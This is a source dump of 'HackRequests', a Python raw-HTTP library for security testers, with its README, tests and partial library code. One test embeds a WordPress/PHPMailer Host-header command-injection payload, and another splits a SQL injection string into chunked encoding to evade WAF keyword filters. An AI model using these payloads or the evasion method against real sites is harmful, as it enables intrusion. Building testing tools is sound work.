├── tests
    ├── __init__.py
    ├── test_http_raw_pool.py
    ├── test_http.py
    ├── test_real_host.py
    ├── auto_build_chunked.py
    └── test_http_raw.py
├── docs
    └── History.md
├── HackRequests
    ├── __init__.py
    └── HackRequests.py
├── makefile
├── setup.py
├── LICENSE
├── .gitignore
└── README.md
/tests/__init__.py:
--------------------------------------------------------------------------------
1 | 
--------------------------------------------------------------------------------
/docs/History.md:
--------------------------------------------------------------------------------
1 | [1.2]
2 | - Fix #7
3 | 
4 | [1.0]
5 | 
6 | 2019-03-09 15:22:13
7 | - Refactored the httpraw method; chunked request bodies are now supported
8 | - Added test cases
9 | 
10 | [0.3.4]
11 | - Support a custom Host field and a real host/IP
12 | - Fixed the "accept */*" header issue
13 | 
14 | [0.3.0]
15 | - Super easy-to-use initial version
--------------------------------------------------------------------------------
/HackRequests/__init__.py:
--------------------------------------------------------------------------------
1 | __title__ = 'HackRequests'
2 | __version__ = '1.2'
3 | __author__ = 'w8ay'
4 | __author_email__ = 'w8ay@qq.com'
5 | __url__ = 'https://github.com/boy-hack/hack-requests/'
6 | __license__ = 'MIT'
7 | __copyright__ = 'Copyright 2019'
8 | 
9 | from HackRequests.HackRequests import *
--------------------------------------------------------------------------------
/makefile:
--------------------------------------------------------------------------------
1 | SRC_DIR = HackRequests
2 | MAKE = make
3 | 
4 | 
5 | .PHONY: prebuildclean install build pypimeta pypi publish clean
6 | 
7 | 
8 | prebuildclean:
9 | 	@+python -c "import shutil; shutil.rmtree('build', True)"
10 | 	@+python -c "import shutil; shutil.rmtree('dist', True)"
11 | 	@+python -c "import shutil; shutil.rmtree('HackRequests.egg-info', True)"
12 | 
13 | install:
14 | 	python3 setup.py install
15 | 
16 | build:
17 | 	@make prebuildclean
18 | 	python3 setup.py sdist --formats=zip bdist_wheel
19 | 
20 | pypimeta:
21 | 	twine register
22 | 
23 | pypi:
24 | 	twine upload dist/*
25 | 
26 | publish:
27 | 	@make build
28 | 	#@make pypimeta
29 | 	@make pypi
30 | 
31 | clean:
32 | 	rm -rf *.egg-info dist build .tox
33 | 	find $(SRC_DIR) tests -type f -name '*.pyc' -delete
--------------------------------------------------------------------------------
/tests/test_http_raw_pool.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | # -*- coding: utf-8 -*-
3 | # @Time : 2019/4/28 9:16 PM
4 | # @Author : w8ay
5 | # @File : test_http_raw_pool.py
6 | import HackRequests
7 | 
8 | 
9 | def _callback(r: HackRequests.response):
10 |     # Fetch the result from the callback; the argument r is the response object
11 |     print(len(r.text()))
12 | 
13 | 
14 | threadpool = HackRequests.threadpool(threadnum=10, callback=_callback, timeout=10)
15 | raw = '''
16 | GET / HTTP/1.1
17 | Host: x.hacking8.com
18 | Connection: Keep-Alive
19 | Cache-Control: max-age=0
20 | Upgrade-Insecure-Requests: 1
21 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
22 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
23 | Accept-Encoding: gzip, deflate
24 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
25 | '''
26 | 
27 | for i in range(20):
28 |     threadpool.httpraw(raw)
29 | threadpool.run()
30 | 
--------------------------------------------------------------------------------
/setup.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding:utf-8
3 | from setuptools import setup
4 | from HackRequests import (
5 |     __title__, __version__, __author__, __url__,
6 |     __author_email__, __license__)
7 | setup(
8 |     name=__title__,
9 |     version=__version__,
10 |     description="hack-requests is an HTTP network library for hackers.",
11 |     long_description='''HackRequests is an HTTP network library for hackers, based on Python 3.x. It offers a lightweight, requests-like design and exposes the raw request/response packets to make further analysis easy. If you use Burp Suite, you can copy a raw message and replay it directly, and for large numbers of HTTP requests the HackRequests thread pool delivers the fastest possible throughput.''',
12 |     author=__author__,
13 |     author_email=__author_email__,
14 |     url=__url__,
15 |     license=__license__,
16 |     package_data={'HackRequests': ['*.md']},
17 |     package_dir={'HackRequests': 'HackRequests'},
18 |     packages=['HackRequests'],
19 |     include_package_data=True,
20 |     keywords='http requests hacker',
21 | )
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 | 
3 | Copyright (c) 2018 boyhack
4 | 
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | -------------------------------------------------------------------------------- /tests/test_http.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | # @Time : 2019/3/9 2:53 PM 4 | # @Author : w8ay 5 | # @File : test_http.py 6 | import unittest 7 | import HackRequests 8 | import json 9 | 10 | 11 | class TestCase(unittest.TestCase): 12 | def setUp(self): 13 | self.hack = HackRequests.hackRequests() 14 | 15 | def test_get(self): 16 | r = self.hack.http("http://httpbin.org/get?a=1&b=2&c=heloo") 17 | self.assertTrue(json.loads(r.text())["args"] == {"a": "1", "b": "2", "c": "heloo"}) 18 | 19 | def test_post(self): 20 | data = "a=1&b=2&c=heloo" 21 | r = self.hack.http("http://httpbin.org/post", post=data) 22 | self.assertTrue(json.loads(r.text())["form"] == {"a": "1", "b": "2", "c": "heloo"}) 23 | 24 | def test_json(self): 25 | data = '{"hack-requests":"v1.0","author":"w8ay"}' 26 | r = self.hack.http("http://httpbin.org/post", post=data) 27 | self.assertTrue("hack-requests" in r.text()) 28 | 29 | def test_localhost(self): 30 | headers = { 31 | "Referer": "xx", 32 | "referer": "xx" 33 | } 34 | r = self.hack.http("https://x.hacking8.com", headers=headers) 35 | print(r.text()) 36 | -------------------------------------------------------------------------------- /tests/test_real_host.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | # @Time : 2019/3/9 2:22 PM 4 | # @Author : w8ay 5 | # @File : test_real_host.py 6 | import unittest 7 | import HackRequests 8 | 9 | 10 | class TestCase(unittest.TestCase): 11 | def setUp(self): 12 | self.hack = HackRequests.hackRequests() 13 | 14 | def test_real_ip(self): 15 | raw = ''' 16 | POST / HTTP/1.1 17 | Host: aa(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}test.txt}} null) 18 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 19 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 20 | Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3 21 | Accept-Encoding: gzip, deflate 22 | Referer: http://172.16.176.128:8000/wp-login.php?action=lostpassword 23 | Cookie: wordpress_test_cookie=WP+Cookie+check 24 | DNT: 1 25 | Connection: close 26 | Upgrade-Insecure-Requests: 1 27 | Content-Type: application/x-www-form-urlencoded 28 | 29 | user_login=admin&redirect_to=&wp-submit=Get+New+Password 30 | ''' 31 | r = self.hack.httpraw(raw, real_host="httpbin.org") 32 | self.assertTrue("405" in r.text()) 33 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | *.egg-info/ 24 | .installed.cfg 25 | *.egg 26 | MANIFEST 27 | 28 | # PyInstaller 29 | # Usually these files are written by a python script from a template 30 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 
31 | *.manifest
32 | *.spec
33 | 
34 | # Installer logs
35 | pip-log.txt
36 | pip-delete-this-directory.txt
37 | 
38 | # Unit test / coverage reports
39 | htmlcov/
40 | .tox/
41 | .coverage
42 | .coverage.*
43 | .cache
44 | nosetests.xml
45 | coverage.xml
46 | *.cover
47 | .hypothesis/
48 | .pytest_cache/
49 | 
50 | # Translations
51 | *.mo
52 | *.pot
53 | 
54 | # Django stuff:
55 | *.log
56 | local_settings.py
57 | db.sqlite3
58 | 
59 | # Flask stuff:
60 | instance/
61 | .webassets-cache
62 | 
63 | # Scrapy stuff:
64 | .scrapy
65 | 
66 | # Sphinx documentation
67 | docs/_build/
68 | 
69 | # PyBuilder
70 | target/
71 | 
72 | # Jupyter Notebook
73 | .ipynb_checkpoints
74 | 
75 | # pyenv
76 | .python-version
77 | 
78 | # celery beat schedule file
79 | celerybeat-schedule
80 | 
81 | # SageMath parsed files
82 | *.sage.py
83 | 
84 | # Environments
85 | .env
86 | .venv
87 | env/
88 | venv/
89 | ENV/
90 | env.bak/
91 | venv.bak/
92 | 
93 | # Spyder project settings
94 | .spyderproject
95 | .spyproject
96 | 
97 | # Rope project settings
98 | .ropeproject
99 | 
100 | # mkdocs documentation
101 | /site
102 | 
103 | # mypy
104 | .mypy_cache/
105 | .idea/
106 | .vscode/
107 | test.py
108 | .DS_Store
109 | 
--------------------------------------------------------------------------------
/tests/auto_build_chunked.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | # -*- coding: utf-8 -*-
3 | # @Time : 2019/3/9 10:21 PM
4 | # @Author : w8ay
5 | # @File : auto_build_chunked.py
6 | 
7 | # Build the chunked body from the payload automatically, splitting around keywords
8 | # chunk_size stays within 1-9; when a chunk would contain a whole keyword, it is shrunk and split
9 | import string
10 | 
11 | import HackRequests
12 | import random
13 | 
14 | 
15 | def chunk_data(data, keywords: list):
16 |     dl = len(data)
17 |     ret = ""
18 |     index = 0
19 |     while index < dl:
20 |         chunk_size = random.randint(1, 9)
21 |         if index + chunk_size >= dl:
22 |             chunk_size = dl - index
23 |         salt = ''.join(random.sample(string.ascii_letters + string.digits, 5))
24 |         while 1:  # shrink chunk_size until the chunk no longer contains a whole keyword
25 |             tmp_chunk = data[index:index + chunk_size]
26 |             tmp_bool = True
27 |             for k in keywords:
28 |                 if k in tmp_chunk:
29 |                     chunk_size -= 1
30 |                     tmp_bool = False
31 |                     break
32 |             if tmp_bool:
33 |                 break
34 |         index += chunk_size
35 |         ret += "{0};{1}\r\n".format(hex(chunk_size)[2:], salt)
36 |         ret += "{0}\r\n".format(tmp_chunk)
37 | 
38 |     ret += "0\r\n\r\n"
39 |     return ret
40 | 
41 | 
42 | payload = "id=-1' and union select user(),2,3,4,5 from table"
43 | keywords = ['and', 'union', 'select', 'user', 'from']
44 | data = chunk_data(payload, keywords)
45 | 
46 | raw = '''
47 | POST /post HTTP/1.1
48 | Host: httpbin.org
49 | Cache-Control: max-age=0
50 | Upgrade-Insecure-Requests: 1
51 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
52 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
53 | Accept-Encoding: gzip, deflate
54 | Content-Type: application/x-www-form-urlencoded
55 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
56 | Transfer-Encoding: Chunked
57 | 
58 | {}
59 | 
60 | '''.format(data)
61 | hack = HackRequests.hackRequests()
62 | 
63 | r = hack.httpraw(raw)
64 | print(raw)
65 | 
66 | print(r.text())
67 | print(r.log)
68 | 
--------------------------------------------------------------------------------
/tests/test_http_raw.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | # -*- coding: utf-8 -*-
3 | # @Time : 2019/3/9 11:22 AM
4 | # @Author : w8ay
5 | # @File
: test_http.py 6 | import unittest 7 | import HackRequests 8 | import json 9 | 10 | 11 | class TestCase(unittest.TestCase): 12 | def setUp(self): 13 | self.hack = HackRequests.hackRequests() 14 | 15 | def test_get(self): 16 | raw = ''' 17 | GET /get?a=1&b=2&c=heloo HTTP/1.1 18 | Host: httpbin.org 19 | Connection: keep-alive 20 | Upgrade-Insecure-Requests: 1 21 | User-Agent: celebrate hack-requests 1.0 ! 22 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 23 | Accept-Encoding: gzip, deflate 24 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 25 | Cookie: _gauges_unique_hour=1; _gauges_unique_day=1; _gauges_unique_month=1; _gauges_unique_year=1; _gauges_unique=1 26 | ''' 27 | r = self.hack.httpraw(raw) 28 | self.assertTrue(json.loads(r.text())["args"] == {"a": "1", "b": "2", "c": "heloo"}) 29 | 30 | def test_post(self): 31 | raw = ''' 32 | POST /post HTTP/1.1 33 | Host: httpbin.org 34 | Connection: keep-alive 35 | Upgrade-Insecure-Requests: 1 36 | User-Agent: celebrate hack-requests 1.0 ! 37 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 38 | Accept-Encoding: gzip, deflate 39 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 40 | Cookie: _gauges_unique_hour=1; _gauges_unique_day=1; _gauges_unique_month=1; _gauges_unique_year=1; _gauges_unique=1 41 | 42 | a=1&b=2&c=heloo 43 | ''' 44 | r = self.hack.httpraw(raw) 45 | self.assertTrue("a=1&b=2&c=heloo" in r.text()) 46 | 47 | def test_json(self): 48 | raw = ''' 49 | POST /post HTTP/1.1 50 | Host: httpbin.org 51 | Connection: keep-alive 52 | Upgrade-Insecure-Requests: 1 53 | User-Agent: celebrate hack-requests 1.0 ! 54 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 55 | Accept-Encoding: gzip, deflate 56 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 57 | Cookie: _gauges_unique_hour=1; _gauges_unique_day=1; _gauges_unique_month=1; _gauges_unique_year=1; _gauges_unique=1 58 | 59 | {"hack-requests":"v1.0","author":"w8ay"} 60 | ''' 61 | r = self.hack.httpraw(raw) 62 | self.assertTrue(json.loads(r.text())["json"] == {"author": "w8ay", "hack-requests": "v1.0"}) 63 | 64 | def test_chunked(self): 65 | raw = ''' 66 | POST /post HTTP/1.1 67 | Host: httpbin.org 68 | Cache-Control: max-age=0 69 | Upgrade-Insecure-Requests: 1 70 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 71 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8 72 | Accept-Encoding: gzip, deflate 73 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 74 | Transfer-Encoding: Chunked 75 | 76 | 7;asdasdzxc 77 | hellowo 78 | 7;qq321 79 | rld!hel 80 | 7;asd 81 | loworld 82 | 7;qqq 83 | hellow 84 | 5;88 85 | or ld 86 | 0 87 | 88 | ''' 89 | r = self.hack.httpraw(raw) 90 | print(r.text()) 91 | self.assertTrue("helloworld!helloworld hellowor ld" in r.text()) 92 | 93 | def test_redirect(self): 94 | raw = ''' 95 | GET / HTTP/1.1 96 | Host: www.python.org 97 | Connection: Keep-Alive 98 | Cache-Control: max-age=0 99 | Upgrade-Insecure-Requests: 1 100 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 101 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 102 | Accept-Encoding: gzip, deflate 103 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 104 | ''' 105 | r = self.hack.httpraw(raw) 106 | self.assertEqual(r.status_code, 200) 107 | 
self.assertIn('class="python home"', r.text())
108 | 
109 |         r = self.hack.httpraw(raw, location=False)
110 |         self.assertEqual(r.status_code, 301)
111 |         self.assertTrue(r.text() == "")
112 | 
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # hack-requests
2 | HackRequests is a low-level HTTP library for hackers, based on `Python3.x`. It offers a requests-like design without the bulk and exposes the raw request/response packets to make further analysis easy. If you use Burp Suite, you can copy a raw message and replay it directly, and for large numbers of HTTP requests the hack-requests thread pool delivers the fastest possible throughput.
3 | 
4 | - A design as pleasant to use as requests
5 | - Interfaces that expose the raw request and response packets for further analysis
6 | - Send raw HTTP messages and replay captures from Burp Suite and other intercepting proxies
7 | - hack-requests is a single-file module that is easy to port into other projects.
8 | 
9 | ## Installation
10 | - Python 3 only
11 | - pip install HackRequests
12 | 
13 | ## Features
14 | 
15 | ### No need to worry about parameter types
16 | 
17 | In the `requests` module, headers, cookies, POST data and so on are passed as dictionaries for convenience. Hackers, however, usually capture plain text, and converting it to a dictionary by hand is slow and tedious. In `HackRequests` these parameters can be passed either as a dictionary or as raw text; the library detects the type and converts it automatically.
18 | 
19 | ```python
20 | import HackRequests
21 | 
22 | hack = HackRequests.hackRequests()
23 | url = "http://x.hacking8.com"
24 | 
25 | header = '''
26 | Connection: keep-alive
27 | Cache-Control: max-age=0
28 | Upgrade-Insecure-Requests: 1
29 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
30 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
31 | Accept-Encoding: gzip, deflate
32 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
33 | '''
34 | hh = hack.http(url, headers=header)
35 | print(hh.text())
36 | 
37 | headers = {
38 |     "Connection": "keep-alive",
39 |     "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
40 | }
41 | uu = hack.http(url, headers=headers)
42 | print(uu.text())
43 | 
44 | ```
45 | 
46 | ### Access to the raw packets
47 | 
48 | Every result returned by `hackRequests` carries a `log` attribute that records the raw `request` and `response`; these two values are extremely useful when writing scanners.
49 | 
50 | ```python
51 | import HackRequests
52 | 
53 | hack = HackRequests.hackRequests()
54 | url = "http://x.hacking8.com"
55 | 
56 | header = '''
57 | Connection: keep-alive
58 | Cache-Control: max-age=0
59 | Upgrade-Insecure-Requests: 1
60 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
61 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
62 | Accept-Encoding: gzip, deflate
63 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
64 | '''
65 | hh = hack.http(url, headers=header)
66 | print(hh.log.get("request"))
67 | print()
68 | print(hh.log.get("response"))
69 | 
70 | ```
71 | 
72 | Output:
73 | 
74 | ```bash
75 | GET / HTTP/1.1
76 | Host: x.hacking8.com
77 | Connection: Keep-Alive
78 | Cache-Control: max-age=0
79 | Upgrade-Insecure-Requests: 1
80 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
81 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
82 | Accept-Encoding: gzip, deflate
83 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
84 | 
85 | HTTP/1.1 200 OK
86 | Server: nginx
87 | Date: Sat, 01 Sep 2018 12:52:35 GMT
88 | Content-Type: text/html
89 | Content-Length: 580
90 | Last-Modified: Thu, 16 Aug 2018 09:50:56 GMT
91 | Connection: keep-alive
92 | ETag: "5b754900-244"
93 | Accept-Ranges: bytes
94 | ```
95 | 
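Because `log` preserves the exact packets that were sent and received, it is easy to build small scanner checks on top of it. Below is a minimal sketch (the probe parameter and marker string are made up for illustration) that flags a response when the probe value is reflected in the body:

```python
import HackRequests

hack = HackRequests.hackRequests()
marker = "hackreq_probe_9527"  # hypothetical marker, any unlikely string works
hh = hack.http("http://x.hacking8.com/?q=" + marker)

if marker in hh.text():
    # keep the raw packets as evidence for the report
    print("marker reflected in response")
    print(hh.log.get("request"))
    print(hh.log.get("response"))
```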
96 | ### Burp Suite replay
97 | 
98 | Requests captured by Burp Suite or any other intercepting proxy can be replayed directly:
99 | 
100 | ```python
101 | import HackRequests
102 | 
103 | hack = HackRequests.hackRequests()
104 | raw = '''
105 | GET / HTTP/1.1
106 | Host: x.hacking8.com
107 | Connection: Keep-Alive
108 | Cache-Control: max-age=0
109 | Upgrade-Insecure-Requests: 1
110 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
111 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
112 | Accept-Encoding: gzip, deflate
113 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
114 | '''
115 | hh = hack.httpraw(raw)
116 | print(hh.text())
117 | ```
118 | 
119 | ### Built-in thread pool
120 | 
121 | For concurrent network access, the HackRequests thread pool helps you push concurrency to the limit.
122 | ```python
123 | import HackRequests
124 | 
125 | 
126 | def _callback(r: HackRequests.response):
127 |     # Fetch the result from the callback; the argument r is the response object
128 |     print(r.text())
129 | 
130 | 
131 | threadpool = HackRequests.threadpool(threadnum=10, callback=_callback)
132 | url = "http://www.baidu.com"
133 | for i in range(50):
134 |     threadpool.http(url)
135 | threadpool.run()
136 | ```
137 | 
138 | ### Learning the code
139 | 
140 | The code is open source: fewer than 500 commented lines make it easy to understand how the project works.
141 | 
142 | ## Documentation
143 | 
144 | ### Quick start
145 | 
146 | ```python
147 | import HackRequests
148 | hack = HackRequests.hackRequests()
149 | url = "http://www.baidu.com/index.php"
150 | u = hack.http(url, method="HEAD")
151 | ```
152 | 
153 | Note: the `HEAD` method is a faster way to check whether a page exists.
154 | 
155 | `hack.http()` accepts the following parameters; apart from `url`, none of them is required.
156 | 
157 | | Parameter | Description | Type |
158 | | ----------- | ------------------------------------------------------------ | -------- |
159 | | url (required) | The address to request | Str |
160 | | post | POST body; when set, `method` automatically becomes `POST`. Accepts `Str` or `Dict` | Str/Dict |
161 | | method | Request method; HEAD, GET and POST are supported, default GET | Str |
162 | | location | Follow 301/302 redirects automatically, default True | Bool |
163 | | proxy | Proxy, passed as a tuple such as ('127.0.0.1','8080') | Tuple |
164 | | headers | Custom HTTP headers, as a dict or a raw header block | Str/Dict |
165 | | cookie | Custom cookie, as a dict or a raw cookie string | Str/Dict |
166 | | referer | Referer to send | Str |
167 | | user_agent | User-Agent to send; if empty, a normal-looking one is used | Str |
168 | | real_host | For Host-header injection: put the injection payload in the Host header and the real address here, e.g. "127.0.0.1:8000". See https://github.com/boy-hack/hack-requests/blob/master/demo/CVE-2016-10033.py | str |
169 | 
170 | ### Sending raw HTTP messages
171 | 
172 | Use the `httpraw` method of `hackRequests`:
173 | 
174 | ```python
175 | import HackRequests
176 | 
177 | hack = HackRequests.hackRequests()
178 | raw = '''
179 | GET / HTTP/1.1
180 | Host: x.hacking8.com
181 | Connection: Keep-Alive
182 | Cache-Control: max-age=0
183 | Upgrade-Insecure-Requests: 1
184 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
185 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
186 | Accept-Encoding: gzip, deflate
187 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
188 | '''
189 | hh = hack.httpraw(raw)
190 | print(hh.text())
191 | ```
192 | 
193 | | Parameter | Type | Description |
194 | | --------- | -------- | ------------------------------------------------------------ |
195 | | raw (required) | Str | The raw HTTP message |
196 | | ssl | Bool | Whether the site uses https, default False |
197 | | proxy | Tuple | Proxy address |
198 | | location | Bool | Follow redirects automatically, default True |
199 | | real_host | str | For Host-header injection: put the injection payload in the Host header and the real address here, e.g. "127.0.0.1:8000". See https://github.com/boy-hack/hack-requests/blob/master/demo/CVE-2016-10033.py |
200 | 
201 | Note: `httpraw` ultimately parses the message and hands it to the `http` method, so every parameter accepted by `http` can also be used here.
202 | 
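These keyword arguments can be combined freely. A small sketch (the proxy address below is only a placeholder) that replays a capture over HTTPS through a local intercepting proxy without following redirects:

```python
import HackRequests

hack = HackRequests.hackRequests()
raw = '''
GET / HTTP/1.1
Host: x.hacking8.com
Connection: close
'''
# ssl=True targets https (port 443), proxy tunnels through the given host/port,
# location=False returns the 30x response itself instead of following it
hh = hack.httpraw(raw, ssl=True, proxy=('127.0.0.1', '8080'), location=False)
print(hh.status_code)
```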
203 | ### response
204 | 
205 | The return value of `hack.http()` can be inspected through the following interface:
206 | 
207 | | Attribute | Description | Return type |
208 | | ----------- | ------------------------------- | ---------- |
209 | | status_code | HTTP status code | Int |
210 | | content() | Response body as bytes | Bytes |
211 | | text() | Response body as text (decoded automatically) | Str |
212 | | header | Raw response headers | Str |
213 | | headers | Response headers as a dict | Dict |
214 | | charset | Detected character encoding | Str |
215 | | log | Raw request/response packets that were sent and received | Dict |
216 | | url | The URL; if a redirect happened, the URL after the redirect | Str |
217 | | cookie | Cookie string after the request | Str |
218 | | cookies | Cookies after the request, as a dict | Dict |
219 | 
220 | ### Thread pool
221 | 
222 | ```python
223 | import HackRequests
224 | 
225 | 
226 | def _callback(r: HackRequests.response):
227 |     # Fetch the result from the callback; the argument r is the response object
228 |     print(r.text())
229 | 
230 | 
231 | threadpool = HackRequests.threadpool(threadnum=10, callback=_callback, timeout=10)
232 | # timeout sets the HTTP timeout; if unset it defaults to 10s. threadnum (default 10) depends on your machine: the larger it is, the more threads run and the more sites are requested per second.
233 | url = "http://www.baidu.com"
234 | for i in range(50):
235 |     threadpool.http(url)
236 | threadpool.run()
237 | ```
238 | The callback argument r is a response object; see [Documentation] - [response].
239 | Once a thread pool has been created as `threadpool`, the following methods are available:
240 | 
241 | | Method | Arguments | Description |
242 | | --------- | ----------------------- | ---------------------------------- |
243 | | http() | See [Documentation] - [Quick start] | Put the HTTP request on the thread queue, ready to run |
244 | | httpraw() | See [Documentation] - [Quick start] | Put the HTTP request on the thread queue, ready to run |
245 | | stop() | | Stop the thread pool |
246 | | run() | | Start the thread pool |
247 | 
248 | 
249 | 
--------------------------------------------------------------------------------
/HackRequests/HackRequests.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | # @Author : w8ay
4 | # @Mail : w8ay@qq.com
5 | # @File : hackRequests.py
6 | 
7 | import copy
8 | import gzip
9 | import queue
10 | import socket
11 | import ssl
12 | import threading
13 | import time
14 | import zlib
15 | from http import client
16 | from urllib import parse
17 | 
18 | 
19 | class HackError(Exception):
20 |     def __init__(self, content):
21 |         self.content = content
22 | 
23 |     def __str__(self):
24 |         return self.content
25 | 
26 | 
27 | def extract_dict(text, sep, sep2="="):
28 |     """Split a string into a dict according to the given separators.
29 |     Args:
30 |         text: the text to split
31 |         sep: the first separator, usually '\n'
32 |         sep2: the second separator, '=' by default
33 |     Return:
34 |         A dict whose keys are the part before sep2 and whose values are the part after it.
35 | 
36 |         Only text can be converted; passing any other type raises an error.
37 |     """
38 |     _dict = dict([l.split(sep2, 1) for l in text.split(sep)])
39 |     return _dict
40 | 
41 | 
42 | class httpcon(object):
43 |     '''
44 |     httpcon creates the HTTP connections.
45 | 
46 |     Attributes:
47 |         timeout: connection timeout
48 |     '''
49 | 
50 |     def __init__(self, timeout=10):
51 |         self.timeout = timeout
52 |         self.protocol = []
53 |         self._get_protocol()
54 | 
55 |     def _get_protocol(self):
56 |         if not self.protocol:
57 |             ps = (
58 |                 'PROTOCOL_SSLv23', 'PROTOCOL_TLSv1',
59 |                 'PROTOCOL_SSLv2', 'PROTOCOL_TLSv1_1', 'PROTOCOL_TLSv1_2')
60 |             for p in ps:
61 |                 pa = getattr(ssl, p, None)
62 |                 if pa:
63 |                     self.protocol.append(pa)
64 | 
65 |     '''
66 |     Get a connection.
67 | 
68 |     This is the most important part of the connection pool; connection creation and reuse all happen here.
69 |     '''
70 | 
71 |     def get_con(self, url, proxy=None):
72 |         scheme, host, port, path = url
73 |         conn = self._make_con(scheme, host, port, proxy)
74 |         return conn
75 | 
76 |     def _make_con(self, scheme, host, port, proxy=None):
77 |         if "https" != scheme:
78 |             if proxy:
79 |                 con = client.HTTPConnection(
